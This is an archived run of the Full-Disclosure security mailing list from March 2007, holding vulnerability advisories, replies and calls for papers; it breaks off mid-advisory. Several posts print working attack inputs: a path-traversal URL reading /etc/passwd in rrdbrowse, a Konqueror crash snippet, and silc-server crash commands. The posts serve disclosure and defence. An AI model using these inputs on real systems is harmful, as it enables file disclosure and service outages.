<200703041901.l24J1p1K012209@turing-police.cc.vt.edu> (First attempt to post fell afoul of an RBL) On Sat, 03 Mar 2007 20:06:46 +0100, Paul Sebastian Ziegler said: > 1) Has anybody researched this before (no need to crash open doors) > 2) Is PostScript capable of using the system()-call or something similar? Hardly news. Quoting RFC1341, section 7.4.2, issued in June 1992, as part of the original specification of MIME: 7.4.2 The Application/PostScript subtype A Content-Type of "application/postscript" indicates a PostScript program. The language is defined in [POSTSCRIPT]. It is recommended that Postscript as sent through email should use Postscript document structuring conventions if at all possible, and correctly. The execution of general-purpose PostScript interpreters entails serious security risks, and implementors are discouraged from simply sending PostScript email bodies to "off-the-shelf" interpreters. While it is usually safe to send PostScript to a printer, where the potential for harm is greatly constrained, implementors should consider all of the following before they add interactive display of PostScript bodies to their mail readers. The remainder of this section outlines some, though probably not all, of the possible problems with sending PostScript through the mail. Dangerous operations in the PostScript language include, but may not be limited to, the PostScript operators deletefile, renamefile, filenameforall, and file. File is only dangerous when applied to something other than standard input or output. Implementations may also define additional nonstandard file operators; these may also pose a threat to security. Filenameforall, the wildcard file search operator, may appear at first glance to be harmless. Note, however, that this operator has the potential to reveal information about what files the recipient has access to, and this information may itself be sensitive. Message senders should avoid the use of potentially dangerous file operators, since these operators are quite likely to be unavailable in secure PostScript implementations. Message- receiving and -displaying software should either completely disable all potentially dangerous file operators or take special care not to delegate any special authority to their operation. These operators should be viewed as being done by an outside agency when interpreting PostScript documents. Such disabling and/or checking should be done completely outside of the reach of the PostScript language itself; care should be taken to insure that no method exists for reenabling full-function versions of these operators. The PostScript language provides facilities for exiting the normal interpreter, or server, loop. Changes made in this "outer" environment are customarily retained across documents, and may in some cases be retained semipermanently in nonvolatile memory. The operators associated with exiting the interpreter loop have the potential to interfere with subsequent document processing. As such, their unrestrained use constitutes a threat of service denial. PostScript operators that exit the interpreter loop include, but may not be limited to, the exitserver and startjob operators. Message-sending software should not generate PostScript that depends on exiting the interpreter loop to operate. The ability to exit will probably be unavailable in secure PostScript implementations. Message-receiving and -displaying software should, if possible, disable the ability to make retained changes to the PostScript environment. Eliminate the startjob and exitserver commands. If these commands cannot be eliminated, at least set the password associated with them to a hard-to-guess value. PostScript provides operators for setting system-wide and device-specific parameters. These parameter settings may be retained across jobs and may potentially pose a threat to the correct operation of the interpreter. The PostScript operators that set system and device parameters include, but may not be limited to, the setsystemparams and setdevparams operators. Message-sending software should not generate PostScript that depends on the setting of system or device parameters to operate correctly. The ability to set these parameters will probably be unavailable in secure PostScript implementations. Message-receiving and -displaying software should, if possible, disable the ability to change system and device parameters. If these operators cannot be disabled, at least set the password associated with them to a hard-to-guess value. Some PostScript implementations provide nonstandard facilities for the direct loading and execution of machine code. Such facilities are quite obviously open to substantial abuse. Message-sending software should not make use of such features. Besides being totally hardware- specific, they are also likely to be unavailable in secure implementations of PostScript. Message-receiving and -displaying software should not allow such operators to be used if they exist. PostScript is an extensible language, and many, if not most, implementations of it provide a number of their own extensions. This document does not deal with such extensions explicitly since they constitute an unknown factor. Message-sending software should not make use of nonstandard extensions; they are likely to be missing from some implementations. Message-receiving and -displaying software should make sure that any nonstandard PostScript operators are secure and don't present any kind of threat. It is possible to write PostScript that consumes huge amounts of various system resources. It is also possible to write PostScript programs that loop infinitely. Both types of programs have the potential to cause damage if sent to unsuspecting recipients. Message-sending software should avoid the construction and dissemination of such programs, which is antisocial. Message-receiving and -displaying software should provide appropriate mechanisms to abort processing of a document after a reasonable amount of time has elapsed. In addition, PostScript interpreters should be limited to the consumption of only a reasonable amount of any given system resource. Finally, bugs may exist in some PostScript interpreters which could possibly be exploited to gain unauthorized access to a recipient's system. Apart from noting this possibility, there is no specific action to take to prevent this, apart from the timely correction of such bugs if any are found. -------------- next part -------------- A non-text attachment was scrubbed... Name: not available Type: application/pgp-signature Size: 226 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070304/0c3b0ee0/attachment.bin From sesser at hardened-php.net Sun Mar 4 19:18:46 2007 From: sesser at hardened-php.net (Stefan Esser) Date: Sun, 04 Mar 2007 20:18:46 +0100 Subject: [Full-disclosure] MOPB-08-2007 - dejavu of dejavu In-Reply-To: <1323880093.20070304214514@security.nnov.ru> References: <1323880093.20070304214514@security.nnov.ru> Message-ID: <45EB1B96.8080708@hardened-php.net> hello 3APA3A schrieb: > Hello mopb, > > phpinfo() crossite scripting > > http://www.php-security.org/MOPB/MOPB-08-2007.html > > was initially(?) reported in 2003 by Silent Needle > > http://securityvulns.com/docs4647.html > Well technically it is a different XSS vulnerability. The one by silent needle obviously affected string variable output. The XSS in MOPB affects only array variable output. Stefan Esser From sebastian at wolfgarten.com Sun Mar 4 19:35:34 2007 From: sebastian at wolfgarten.com (Sebastian Wolfgarten) Date: Sun, 04 Mar 2007 20:35:34 +0100 Subject: [Full-disclosure] Arbitrary file disclosure vulnerability in rrdbrowse <= 1.6 Message-ID: <45EB1F86.7050403@wolfgarten.com> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I - TITLE Security advisory: Arbitrary file disclosure vulnerability in rrdbrowse II - SUMMARY Description: Arbitrary file disclosure vulnerability in rrdbrowse <= 1.6 Author: Sebastian Wolfgarten (sebastian at wolfgarten dot com), http://www.devtarget.org Date: March 4th, 2007 Severity: Medium References: http://www.devtarget.org/rrdbrowse-advisory-03-2007.txt III - OVERVIEW Quote from rrdbrowse.org: "RRDBrowse is a poller daemon, templater and webinterface for RRDTool. It has a threaded daemon which periodically runs from cron. It works with small .nfo files which hold router information and optionally connection details, colors, min max, bandwidth settings, etc, etc. RRDBrowse uses a small caching mechanism to store interface names. It's much MRTG like in it's current state". More information about the product can be found online at http://www.rrdbrowse.org. IV - DETAILS Due to inproper input validation, the CGI application "rrdbrowse" (versions <=1.6) is vulnerable to an arbitrary file disclosure vulnerability. It allows an unauthenticated remote attacker to read any file on the remote system if the user the webserver is running as has permissions to do so. Thus an attacker is able to gain access potentially sensitive information. V - EXPLOIT CODE The vulnerability is trivial to exploit and only requires specifying an URL with a relative file path on the remote system such as http://$target/cgi-bin/rb.cgi?mode=page&file=../../../../../../../../etc/passwd As the input to the "file" parameter is not validated in any way accessing this URL will expose the contents of /etc/passwd to a remote attacker (interestingly except the first line). VI - WORKAROUND/FIX To address this problem, the author of rrdbrowse (Tommy van Leeuwen) has released an updated CVS version (1.7) of the software which is available at http://www.rrdbrowse.org. Hence all users of rrdbrowse are asked to test and install this version as soon as possible. VII - DISCLOSURE TIMELINE 06. February 2007 - Notified vendor 14. Feburary 2007 - Patch/new version released 04. March 2007 - Public disclosure -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.5 (MingW32) Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org iD8DBQFF6x+Gd8QFWG1Rza8RAl6FAKCw6la8aVEeWRjqQrodHDUDAl3vtgCgwmam X8HoWAJAhG3FlWeOebHRCTY= =ifKG -----END PGP SIGNATURE----- From tyoptyop at gmail.com Sun Mar 4 20:08:11 2007 From: tyoptyop at gmail.com (Tyop?) Date: Sun, 4 Mar 2007 21:08:11 +0100 Subject: [Full-disclosure] month of PHP bugs, secondary message? In-Reply-To: References: Message-ID: <985b1a3d0703041208h3a4cbf4ah1cd443286fb48f33@mail.gmail.com> On 3/4/07, Gadi Evron wrote: > ----- > 3. Are PHP applications also a target of this initiative? > > No they are not. If you want a month of PHP application bugs you can > subscribe to the bugtraq or full-disclosure mailinglists. > > ----- > > http://www.php-security.org/ And he didn't speak about false/insignificant holes disclosure. I gave my solution some months ago. Use mail filters "file inclusion", "sql injection"... -> forward spam. Troll detected... (^-^) -- Tyop? Student. From mark at bindshell.net Sun Mar 4 21:37:16 2007 From: mark at bindshell.net (mark) Date: Sun, 04 Mar 2007 21:37:16 +0000 Subject: [Full-disclosure] Extending JavaScript Portscanning to Include Banner Grabbing Message-ID: <45EB3C0C.6030400@bindshell.net> There's a new paper/advisory at: http://bindshell.net/papers/ftppasv Here's a quick summary: A common implementation flaw in FTP clients allows FTP servers to cause clients to connect to other hosts. This seemly small vulnerability has some interesting consequences for web browser security (namely in Firefox, Opera and Konqueror). This paper discusses the FTP client flaw in detail and demonstrates how it can be used to attack web browsers. Proof of concept code is presented that extends existing JavaScript port-scanning techniques to scan any TCP port from Firefox (even though it now implements "port banning" restrictions). Because of the way the same-origin policy is applied it is also possible to perform banner-grabbing scans against arbitrary hosts. Finally, for services that don't return a banner an alternative fingerprinting technique is demonstrated which measures the time it takes servers to close inactive TCP connections. From mark at bindshell.net Sun Mar 4 21:38:01 2007 From: mark at bindshell.net (mark) Date: Sun, 04 Mar 2007 21:38:01 +0000 Subject: [Full-disclosure] Konqueror DoS Via JavaScript Read Of FTP Iframe Message-ID: <45EB3C39.1090504@bindshell.net> Summary Konqueror crashes if JavaScript code tries to read the source of a child iframe which is set to an ftp:// URL. Impact It is possible for malicious websites to crash Konqueror and possibly other applications with rely on KJS. Details The KDE JavaScript implementation, KJS has been found to crash when it tries to read the contents of an FTP iframe. This can be demonstrated by creating a web page with an iframe with a src of "ftp://localhost/anything", then reading the contents of this iframe with JavaScript similar to the following. (A working FTP server is not required). var contents = document.getElementById(iframe_name).contentWindow.document.body.innerHTML; Exploit Proof of concept code is available at: http://bindshell.net/advisories/konq355 Vulnerable Versions This vulnerability has been tested on Gentoo and Debian running KDE 3.5.5. Reported By mark at bindshell.net http://bindshell.net/advisories/konq355 Disclosure Timeline 2007-02-03 Vulnerability reported to security at kde.org 2007-02-28 KDE team recreate bug and produce preliminary patch for nodes.cpp 2007-03-01 KDE team produced updated patch for ecma/kjs_html.cpp 2007-03-04 Public advisory released Patch Information The latest patch received from the KDE team is available from: http://bindshell.net/advisories/konq355/konq355-patch.diff From prabu at hackinthebox.org Mon Mar 5 11:44:10 2007 From: prabu at hackinthebox.org (Praburaajan) Date: Mon, 05 Mar 2007 19:44:10 +0800 Subject: [Full-disclosure] HITBSecConf2007 - Malaysia: Call for Papers now Open Message-ID: <45EC028A.6040407@hackinthebox.org> The CFP for HITBSecConf2007 - Malaysia is now open. HITBSecConf - Malaysia is the premier network security event for the region and the largest gathering of hackers in Asia. Our 2007 event is expected to attract over 700 attendees from around the world and will see 4 keynote speakers in addition to 40 deep-knowledge technical researchers presenting over two-days. Being a deep-knowledge technical conference, talks that are more technical or that discuss new and never before seen attack methods are of more interest than a subject that has been covered several times before. Summaries not exceeding 250 words should be submitted (in plain text format) to cfp at hackinthebox.org for review and possible inclusion in the programme. Submissions are due no later than 1st May 2007. Topics of interest include, but are not limited to the following: # 3G/4G Cellular Networks # SS7/Backbone telephony networks # Analysis of network and security vulnerabilities # Firewall technologies # Intrusion detection # Data Recovery and Incident Response # GPRS and CDMA Security # Identification and Entity Authentication # Network Protocol and Analysis # Smart Card Security # Virus and Worms # WLAN and Bluetooth Security # Analysis of malicious code # Applications of cryptographic techniques # Analysis of attacks against networks and machines # File system security # Security in heterogeneous and large-scale environments PLEASE NOTE: We do not accept product or vendor related pitches. If your talk involves an advertisement for a new product or service your company is offering, please do not submit. Your submission should include: # Name, title, address, email and phone/contact number # Draft of the proposed presentation (in PDF or PowerPoint format), proof of concept for tools and exploits, etc. # Short biography, qualification, occupation, achievement and affiliations (limit 150 words). # Summary or abstract for your presentation (limit 250 words) # Time (45-60 minutes including time for discussion and questions) # Technical requirements (video, internet, wireless, audio, etc.) Each non-resident speaker will receive accommodation for 3 nights. For each non-resident speaker, HITB will cover travel expenses (through our airline partners, Malaysia Airlines) up to USD 1,000.00. HITBSecConf2007 - Malaysia: The Largest Network Security Event in Asia! http://conference.hitb.org/hitbsecconf2007kl/ From shyaam at gmail.com Mon Mar 5 14:08:26 2007 From: shyaam at gmail.com (Shyaam) Date: Mon, 5 Mar 2007 09:08:26 -0500 Subject: [Full-disclosure] Hakin9 Magazine - Request for Article Message-ID: Hi All, To keep this email short. The next issue of Hakin9 study kit is on "Exploits, rootkits, exploit writing, buffer overflow, and so on". The issue after that is on "Intrusion Defense". Website: www.hakin9.org/en Please do shoot me an email at shyaamevilfingers com. I work as an Editor and my duty this time is to collect papers for these issues and enumerate the content based on the goodness factor which is determined by the Hakin9 scale. Thank you for your patience and great to have your contribution. Kind Regards, Shyaam -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070305/bc54fd20/attachment.html From stfr at scip.ch Mon Mar 5 13:06:03 2007 From: stfr at scip.ch (Stefan Friedli) Date: Mon, 05 Mar 2007 14:06:03 +0100 Subject: [Full-disclosure] ePortfolio version 1.0 Java Multiple Input Validation Vulnerabilities Message-ID: <45EC15BB.6050305@scip.ch> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ePortfolio version 1.0 Java Multiple Input Validation Vulnerabilities scip AG Vulnerability ID 2893 (12/22/2006) http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2893 I. INTRODUCTION ePortfolio is a e-banking application by TKS Banking Solutions. More information is available on the vendors web site at the following URL: http://www.tksbankingsolutions.com/ II. DESCRIPTION Stefan Friedli found several web-based vulnerabilities that were identified in ePortfolio version 1.0 Java and may affect earlier versions as well. The application uses heavy amounts of javascript code for operation. As this is not generally a bad thing, it causes massive problems when it comes to data validation. As we recognized, the entire validation of input is realized by client-side javascript which can easily be bypassed using a Proxy BURPproxy or WebScarab to modify original requests sent (and validated) by the browser. We assume this vulnerability to exist in nearly every form offered by the application. Due to the limited functionality of the account used for testing, we're not able to definitely confirm or deny this fact. PoC Code is not being published. IV. IMPACT As there is a serious lack of server-side measured to protect the application from malicious input, an attacker may realize nearly every attack that relies on lacking input-validation which includes Cross Site Scripting and Cross-Site Request Forgery (Session Riding) . V. DETECTION Detection of web based attacks requires a specialized web proxy and/or intrusion detection system. Patterns for detection of basic attacks are available and easy to implement, though they may possibly fail on more sophisticated attacks. VI. SOLUTION Server-side input validation should be provied by the application vendor as soon as possible. VII. VENDOR RESPONSE The problems were recognized and will, according to the vendor, be adressed with the next release by the end of this week. Further, the vendor claims to be able to change the faulty behaviour remotely or by editing a non-specified file for existing customers. VIII. SOURCES scip AG - Security Consulting Information Process (german) http://www.scip.ch scip AG Vulnerability Database (german) http://www.scip.ch/cgi-bin/smss/showadvf.pl?id=2893 IX. DISCLOSURE TIMELINE 12/22/06 Identification of the vulnerabilities 02/05/07 Notification of the vendor 03/02/07 Vendor Response 03/02/07 Release of public advisory IX. CREDITS The vulnerabilities were discovered by Stefan Friedli. Stefan Friedli, scip AG, Zuerich, Switzerland stfr-at-scip.ch http://www.scip.ch A2. LEGAL NOTICES Copyright (c) 2007 scip AG, Switzerland. Permission is granted for the re-distribution of this alert. It may not be edited in any way without permission of scip AG. The information in the advisory is believed to be accurate at the time of publishing based on currently available information. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect or consequential loss or damage from use of or reliance on this advisory. -----BEGIN PGP SIGNATURE----- Version: PGP Desktop 9.0.6 iQA/AwUBRewVwVJ79Mw3xa1EEQImugCeI1Jzz612APrcXkzzIGsuHPB/xz0An3oD j48MiupM2jtTyTp08Oukqkvi =ftmv -----END PGP SIGNATURE----- From skodliv at gmail.com Mon Mar 5 13:31:16 2007 From: skodliv at gmail.com (poo) Date: Mon, 5 Mar 2007 14:31:16 +0100 Subject: [Full-disclosure] Knorr.de SQL Injection and XSS Vulnerabilities In-Reply-To: References: <20070302102325.2admma4uco4kg488@www.gjl-network.net> Message-ID: I CARE On 3/4/07, Lolek of TK53 wrote: > > Hi, > On 3/2/07, sbauer at gjl-network.net wrote: > > Author: Sebastian Bauer > > Web: http://blog.gjl-network.net > > Date: 01/12/07 > > > > Vuln. website: http://www.knorr.de > > Vulnerability: SQL Injection (mainly login authentication bypass + any > > other SQL inj. > > possibility), XSS > > Significance: Very Critical > > OMFG who cares..... > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ > -- smile tomorrow will be worse -------------- next part -------------- An HTML attachment was scrubbed... URL: http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070305/6a3f24a8/attachment.html From labs-no-reply at idefense.com Mon Mar 5 22:18:01 2007 From: labs-no-reply at idefense.com (iDefense Labs) Date: Mon, 05 Mar 2007 17:18:01 -0500 Subject: [Full-disclosure] iDefense Security Advisory 03.05.07: Apple QuickTime Color Table ID Heap Corruption Vulnerability Message-ID: <45EC9719.10206@idefense.com> Apple QuickTime Color Table ID Heap Corruption Vulnerability iDefense Security Advisory 03.05.07 http://labs.idefense.com/intelligence/vulnerabilities/ Mar 05, 2007 I. BACKGROUND Quicktime is Apple's media player product used to render video and other media. For more information visit http://www.apple.com/quicktime/ II. DESCRIPTION Remote exploitation of a heap corruption vulnerability in Apple Computer Inc.'s QuickTime media player could allow an attacker to execute arbitrary commands in the context of the current user. The vulnerability specifically exists in QuickTime players handling of Video media atoms. When the 'Color table ID' field in the Video Sample Description is 0, QuickTime expects a color table to be present immediately after the description. A byte swap process is then performed on the memory following the description, regardless if a table is present or not. Heap corruption will occur in the case when the memory following the description is not part of the heap chunk being processed. III. ANALYSIS Exploitation allows an attacker to execute arbitrary code in the context of the current user. In order to exploit this vulnerability, an attacker must persuade a victim into opening a specially crafted media file. This could be accomplished by either a direct link or referenced from a website under the attacker's control. No further interaction is required in the default configuration. IV. DETECTION iDefense Labs confirmed this vulnerability exists in version 7.1.3 of QuickTime on Windows. Previous versions are suspected to be vulnerable. V. WORKAROUND iDefense is currently unaware of any effective workarounds for this vulnerability. VI. VENDOR RESPONSE Apple has addressed this vulnerability by releasing version 7.1.5 of Quicktime. More information can be found in Apple Advisory APPLE-SA-2007-03-05 at the following URL. http://docs.info.apple.com/article.html?artnum=305149 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2007-0718 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 12/06/2006 Initial vendor notification 12/11/2007 Initial vendor response 02/01/2007 Second vendor notification 03/05/2007 Coordinated public disclosure IX. CREDIT This vulnerability was reported to iDefense by Ruben Santamarta of Reversemode Labs (www.reversemode.com). Get paid for vulnerability research http://labs.idefense.com/methodology/vulnerability/vcp.php Free tools, research and upcoming events http://labs.idefense.com/ X. LEGAL NOTICES Copyright ? 2007 iDefense, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDefense. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please e-mail customerservice at idefense.com for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use of, or reliance on, this information. From wesley at mcgrewsecurity.com Mon Mar 5 18:10:14 2007 From: wesley at mcgrewsecurity.com (Robert Wesley McGrew) Date: Mon, 5 Mar 2007 12:10:14 -0600 Subject: [Full-disclosure] Extending JavaScript Portscanning to Include Banner Grabbing In-Reply-To: <45EB3C0C.6030400@bindshell.net> References: <45EB3C0C.6030400@bindshell.net> Message-ID: On 3/4/07, mark wrote: > There's a new paper/advisory at: http://bindshell.net/papers/ftppasv > > Here's a quick summary: > > A common implementation flaw in FTP clients allows FTP servers > to cause clients to connect to other hosts. This seemly small > vulnerability has some interesting consequences for web browser security > (namely in Firefox, Opera and Konqueror). > > This paper discusses the FTP client flaw in detail and demonstrates how > it can be used to attack web browsers. Proof of concept code is > presented that extends existing JavaScript port-scanning techniques to > scan any TCP port from Firefox (even though it now implements > "port banning" restrictions). Because of the way the same-origin policy > is applied it is also possible to perform banner-grabbing scans against > arbitrary hosts. Finally, for services that don't return a banner an > alternative fingerprinting technique is demonstrated which measures > the time it takes servers to close inactive TCP connections. I love how clever the recent exploits of Firefox have been. They're really fun to play with. I took a look at this technique this morning, compared to the older style of HTTP connections for JavaScript scanning, and I think that a very important note is that this PASV technique allows for one to use web browsers to scan for you, without it being immediately obvious to the target what you're up to (since there's no request headers being pushed to the open ports). While it is indeed quite slow, I think it serves as a much cleaner way to scan, from the perspective of how quiet it is with its interaction with the target. I guess it's a trade-off if you want to poke at the ports a little more by sending some data. I've posted some pcap dumps illustrating the difference, in case anyone wants to see without having to go through all the set-up: http://www.mcgrewsecurity.com/blog/?p=8 So, awesome work! It's a shame your notification to security@ for mozilla got filtered as spam :) -- Robert Wesley McGrew http://mcgrewsecurity.com From bania.piotr at gmail.com Tue Mar 6 04:08:30 2007 From: bania.piotr at gmail.com (Piotr Bania) Date: Tue, 06 Mar 2007 05:08:30 +0100 Subject: [Full-disclosure] Apple QuickTime Player Remote Heap Overflow Message-ID: <45ECE93E.50303@gmail.com> Apple QuickTime Player Remote Heap Overflow by Piotr Bania http://www.piotrbania.com All rights reserved. Severity: Critical - potencial remote code execution. Software affected: Tested on QucikTime 7.1 (Windows version), with all newest add-ons. Timeline: 03/09/2006 Vulerability sent to the vendor. 03/09/2006 Initial vendor response. 06/03/2007 Security bulletin released. Full advisory at: http://www.piotrbania.com/all/adv/quicktime-heap-adv-7.1.txt best regards, pb -- -------------------------------------------------------------------- Piotr Bania - - 0xCD, 0x19 Fingerprint: 413E 51C7 912E 3D4E A62A BFA4 1FF6 689F BE43 AC33 http://www.piotrbania.com - Key ID: 0xBE43AC33 -------------------------------------------------------------------- - "The more I learn about men, the more I love dogs." From smaillist at gmail.com Tue Mar 6 08:57:08 2007 From: smaillist at gmail.com (Sowhat) Date: Tue, 6 Mar 2007 00:57:08 -0800 Subject: [Full-disclosure] Apple QuickTime udta ATOM Integer Overflow Message-ID: Apple QuickTime udta ATOM Integer Overflow By Sowhat of Nevis Labs Date: 2007.03.06 http://www.nevisnetworks.com http://secway.org/advisory/AD20070306.txt http://secway.org/advisory/AD20060512.txt CVE: CVE-2007-0714 Vendor: Apple Inc. Affected Versions: Apple QuickTime versions < 7.1.5 Overview: We have discovered a critical vulnerability in Quicktime Player. The vulnerability allows an attacker to execute arbitrary code in the context of the user who executes QuickTime. This vulnerability can be exploited By persuading a user to open a carefully crafted .mov files or visit a website embedding the malicious .mov file. The CVE-2006-1460 does not patch the root cause of this vulnerability. Details: This vulnerability exists in the way Quicktime process the "udta" Atom of the .mov files. The layout of a udta(user data atom) atom: Bytes _______________________ | User data atom | | Atom size | 4 | Type = 'udta' | 4 | | | User data list | | Atom size | 4 | Type = user data types| 4 | | ----------------------- By setting the value of the Atom size to a large value such as 0xFFFFFFFF, an insufficiently-sized heap block will be allocated, and resulting in a classic complete heap memory overwrite during the RtlAllocateHeap() function. Vendor Response: 2006.05.06 Vendor notified via product-security at apple.com 2006.05.07 Vendor responded 2006.05.09 Vendor ask for more information 2006.05.11 Vendor released QuickTime 7.1, the code path was influenced, but the root cause was not fixed. 2007.03.06 Vendor released the fixed version 2007.03.06 Advisory release Reference: 1. http://developer.apple.com/documentation/QuickTime/QTFF/index.html 2. http://docs.info.apple.com/article.html?artnum=305149 3. http://secway.org/advisory/AD20060512.txt -- Sowhat http://secway.org "Life is like a bug, Do you know how to exploit it ?" From mu-b at digit-labs.org Tue Mar 6 15:41:25 2007 From: mu-b at digit-labs.org (mu-b) Date: Tue, 06 Mar 2007 15:41:25 +0000 Subject: [Full-disclosure] Mercury/32 4.01b Message-ID: <45ED8BA5.6020605@digit-labs.org> Attached is a remote exploit (disarmed PoC) for Mercury/32 4.01b IMAPD. The vulnerability is located in the call:- 034646AE call sub_346ECD9 which is passes (as third argument) the number of bytes remaining in a stack buffer in order to construct the complete command from the continuation data. However the calculation neglects to take into account the length of the previously supplied command ("1 LOGIN <900 x '\x20'> {255}"). The result of the attached exploit is a DoS (given below), however, remote code execution is possible in at least two different ways without authentication... (b24.a70): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=0456d70c ebx=41414141 ecx=7ffad000 edx=034a2970 esi=00000500 edi=00000000 eip=00441d88 esp=0456d6dc ebp=0456d6ec iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 mercuryi!miconfig_proc_3+0xbacd: 0346ed48 8807 mov byte ptr [edi],al ds:0023:04570000=?? (note this may be the same as BID 21110). -- mu-b (mu-b at digit-labs.org) "Only a few people will follow the proof. Whoever does will spend the rest of his life convincing people it is correct." - Anonymous, "P ?= NP" -------------- next part -------------- A non-text attachment was scrubbed... Name: mercurypown-v1.pl Type: text/x-perl Size: 2072 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070306/11368a55/attachment.bin From fukami at berlin.ccc.de Tue Mar 6 15:57:13 2007 From: fukami at berlin.ccc.de (fukami) Date: Tue, 6 Mar 2007 16:57:13 +0100 Subject: [Full-disclosure] Call for Participation Chaos Communication Camp 2007 Message-ID: Chaos Communication Camp 2007 The International Hacker Open Air Gathering "In Fairy Dust We Trust!" August, 8th to 12th, 2007 Airport Museum Finowfurt (Finow Airport) near Berlin, Germany http://events.ccc.de/camp/2007/ === Overview === We ask you to participate in the third Chaos Communication Camp on August, 8th to 12th, 2007 near Berlin, Germany. The Chaos Communication Camp is organized by the Chaos Computer Club (CCC). It is an international, five-day open-air event for hackers and associated life-forms. The Camp features two conference tracks with interesting lectures. Workshops will take place in a central workshop area and in thematic "villages", organized by various groups. You can participate! Bring your tent and join the villages. The Camp has everything you need: power, internet, food, music, sun and fun. The large area features enough space to camp. The Camp is intended to promote the exchange of technical, social and political ideas and concepts to find ways to make this world a little bit more friendly for intelligent beings, be they carbon-based or otherwise. The conference languages are English and German. === Topics === In general, lectures and workshops dealing with technology, ethics, science, security, art, philosophy, politics, culture and cooking are welcome. The main theme of this year's camp is the world we want to live in tomorrow. We try, however, to create a certain focus on a number of topics that we regard as important for the near future. We want: * flying and non-flying autonomous robots * security, encryption and anonymity * software projects * technologies for the day after the climate change * rapid prototyping and fabbing * software and hardware for disaster-resistant infrastructure * bringing broadband to the countryside * politics and propaganda * anti-crowd-control tactics and technologies * lock picking * alternative energy systems * citizen surveillance, data mining technologies, and social networks * data forensic methods * all things radio (preferably digital) * self-sustaining and -reproducing hardware * pollution free transport systems * hacker anthropology and sociology of the scene * flying cars, saucers and carpets * 42 * tesla generators * telecommunication technologies * FPGA based analysis * military technologies * all kinds of voting computers * ebooks * satellites and rockets (and countermeasures against all of the above). === Lecture Requirements === Lectures are expected to be highly relevant in practice or better be darn funny. Sales droids and PR-people have been known to disappear without traces on past events. Interactive workshops are welcome. Hands-on anything are even more welcome. Final presentations for talks should be up to 60 minutes, for workshops up to 60 or 120 minutes long. Additionally, a question-and- answer period will be provided. Follow-up discussions and hands-on workshops are strongly encouraged, there will be space for such activities available outside the main lecture shelters (if you don't prefer a nice sit-in on the grass in the sun). Audio and video recordings of the lectures will be published online in various formats. All material will be available under a Creative Commons licence allowing free non-commercial redistribution of the material as long as the original credit to authors and publishers is retained. === Submissions === All proposals MUST be submitted online using our lecture submission system at https://pentabarf.cccv.de/submission/Camp+2007 . Please follow the instructions given there. You can provide papers and slides for the digital conference pack upon submission. Please make sure your submission contains all information we need to review your talk and send us everything in one go. If you have any questions regarding your submission, feel free to contact us at camp-content at cccv.de but do NOT submit your lecture via e-mail. Accepted speakers are asked to hand in slides used in their talks. Please use a well-known format for your slides. === Dates and deadlines === The deadline for submission is May, 15th, 2007. This deadline is final. If there are remaining slots, we offer a second deadline on June, 5th. Accepted submissions between May, 15th, and June, 5th, will then be allocated to the remaining slots. Notification of acceptance will be sent out by June, 27th, or earlier. Early submissions will be treated with higher priority. -- "I am chaos. I am the substance from which your artists and scientists build rhythms. I am the spirit with which your children and clowns laugh in happy anarchy. I am chaos. I am alive, and I tell you that you are free." Eris, Goddess Of Chaos, Discord & Confusion From a.heidenreich at blacksec.de Tue Mar 6 17:48:08 2007 From: a.heidenreich at blacksec.de (Alexander Heidenreich) Date: Tue, 6 Mar 2007 18:48:08 +0100 Subject: [Full-disclosure] silc-server 1.0.2 denial-of-service vulnerability Message-ID: <200703061848.08684.a.heidenreich@blacksec.de> Hi, there is a bug in the current version of silc-server that makes it possible to crash a networks SILC router or a standalone server, when a new channel is created. All it takes is to specify an invalid hmac algorithm name and no cipher algorithm name. This results in an null pointer dereference in 'SILC_SERVER_CMD_FUNC(join)' at line 2444 in apps/silcd/command.c. To reproduce: /connect yourserver /join nonexistent -hmac nonexistent The attached patch fixes the problem. Best regards, Frank Benkstein -- GPG (Mail): 7093 7A43 CC40 463A 5564 ?599B 88F6 D625 BE63 866F GPG (XMPP): 2243 DBBA F234 7C5A 6D71 ?3983 9F28 4D03 7110 6D51 -------------- next part -------------- A non-text attachment was scrubbed... Name: silc-join-hmac.patch Type: text/x-diff Size: 2882 bytes Desc: not available Url : http://lists.grok.org.uk/pipermail/full-disclosure/attachments/20070306/10bbcc7f/attachment.bin From announce-noreply at rpath.com Tue Mar 6 20:06:28 2007 From: announce-noreply at rpath.com (rPath Update Announcements) Date: Tue, 06 Mar 2007 15:06:28 -0500 Subject: [Full-disclosure] rPSA-2007-0050-1 kernel Message-ID: <45edc9c4.IYhEqeCF18XULrXH%announce-noreply@rpath.com> rPath Security Advisory: 2007-0050-1 Published: 2007-03-06 Products: rPath Linux 1 Rating: Major Exposure Level Classification: Local Deterministic Vulnerability Updated Versions: kernel=/conary.rpath.com at rpl:devel//1/2.6.19.7-0.1-1 References: http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-5753 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0006 https://issues.rpath.com/browse/RPL-1097 https://issues.rpath.com/browse/RPL-1106 Description: Previous versions of the kernel package are vulnerable to multiple local user attacks. One 